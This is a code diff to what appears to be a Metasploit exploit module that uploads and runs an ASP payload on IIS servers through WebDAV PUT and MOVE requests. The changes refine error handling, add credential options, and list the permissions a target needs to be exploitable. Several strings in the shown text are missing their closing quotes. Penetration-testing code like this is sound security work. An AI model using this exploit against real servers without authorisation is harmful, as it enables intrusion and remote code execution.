@@ -17,7 +17,11 @@ def initialize
1717 'Description' => %q{
1818 This module can be used to execute a payload on IIS servers that
1919 have world-writeable directories. The payload is uploaded as an ASP
20- script using a WebDAV PUT request.
20+ script via a WebDAV PUT request.
21+
22+ The target IIS machine must meet these conditions to be considered
23+ as exploitable: It allows 'Script resource access', Read and Write
24+ permission, and supports ASP.
2125 } ,
2226 'Author' => 'hdm' ,
2327 'Platform' => 'win' ,
@@ -36,6 +40,10 @@ def initialize
3640
3741 register_options (
3842 [
43+ # The USERNAME and PASSWORD are registered again to make them more obvious they're
44+ # configurable.
45+ OptString . new ( 'USERNAME' , [ false , 'The HTTP username to specify for authentication' , '' ] ) ,
46+ OptString . new ( 'PASSWORD' , [ false , 'The HTTP password to specify for authentication' , '' ] ) ,
3947 OptString . new ( 'PATH' , [ true , "The path to attempt to upload" , '/metasploit%RAND%.asp' ] )
4048 ] , self . class )
4149 end
@@ -53,24 +61,25 @@ def exploit
5361 #
5462 print_status ( "Uploading #{ asp . length } #{ path_tmp } )
5563
56- res = send_request_cgi ( {
57- 'uri' => path_tmp ,
58- 'method' => 'PUT' ,
59- 'ctype' => 'application/octet-stream' ,
60- 'data' => asp ,
61- } , 20 )
64+ begin
65+ res = send_request_cgi ( {
66+ 'uri' => path_tmp ,
67+ 'method' => 'PUT' ,
68+ 'ctype' => 'application/octet-stream' ,
69+ 'data' => asp ,
70+ } , 20 )
71+ rescue Errno ::ECONNRESET => e
72+ print_error ( "#{ e . message } )
73+ return
74+ end
6275
6376 if ( ! res )
64- print_error ( "Upload failed on #{ path_tmp } [No Response] " )
77+ print_error ( "Connection timed out while uploading to #{ path_tmp } )
6578 return
6679 end
6780
6881 if ( res . code < 200 or res . code >= 300 )
6982 print_error ( "Upload failed on #{ path_tmp } #{ res . code } #{ res . message } )
70- case res . code
71- when 401
72- print_warning ( "Warning: The web site asked for authentication: #{ res . headers [ 'WWW-Authenticate' ] || res . headers [ 'Authentication' ] } )
73- end
7483 return
7584 end
7685
@@ -86,17 +95,15 @@ def exploit
8695 } , 20 )
8796
8897 if ( ! res )
89- print_error ( "Move failed on #{ path_tmp } [No Response] " )
98+ print_error ( "Connection timed out while moving to #{ path } )
9099 return
91100 end
92101
93102 if ( res . code < 200 or res . code >= 300 )
94103 print_error ( "Move failed on #{ path_tmp } #{ res . code } #{ res . message } )
95104 case res . code
96- when 401
97- print_warning ( "Warning: The web site asked for authentication: #{ res . headers [ 'WWW-Authenticate' ] || res . headers [ 'Authentication' ] } )
98105 when 403
99- print_warning ( "Warning: The web site may not allow 'Script Source Access' , which is required to upload executable content.")
106+ print_error ( "IIS possibly does not allow 'Read' permission , which is required to upload executable content.")
100107 end
101108 return
102109 end
@@ -118,6 +125,10 @@ def exploit
118125
119126 if ( res . code < 200 or res . code >= 300 )
120127 print_error ( "Execution failed on #{ path } #{ res . code } #{ res . message } )
128+ case res . message
129+ when 'Object Not Found'
130+ print_error ( "The MOVE verb failed to rename the file. Possibly IIS doesn't allow 'Script Resource Access'." )
131+ end
121132 return
122133 end
123134
@@ -138,7 +149,11 @@ def exploit
138149 end
139150
140151 if ( res . code < 200 or res . code >= 300 )
141- print_error ( "Deletion failed on #{ path } #{ res . code } #{ res . message } )
152+ # Changed this to a warning, because red is scary and if this aprt fails,
153+ # honestly it's not that bad. In most cases this is probably expected anyway
154+ # because by default we're using IWAM_*, which doesn't give us a lot of
155+ # freedom to begin with.
156+ print_warning ( "Deletion failed on #{ path } #{ res . code } #{ res . message } )
142157 return
143158 end
144159
0 commit comments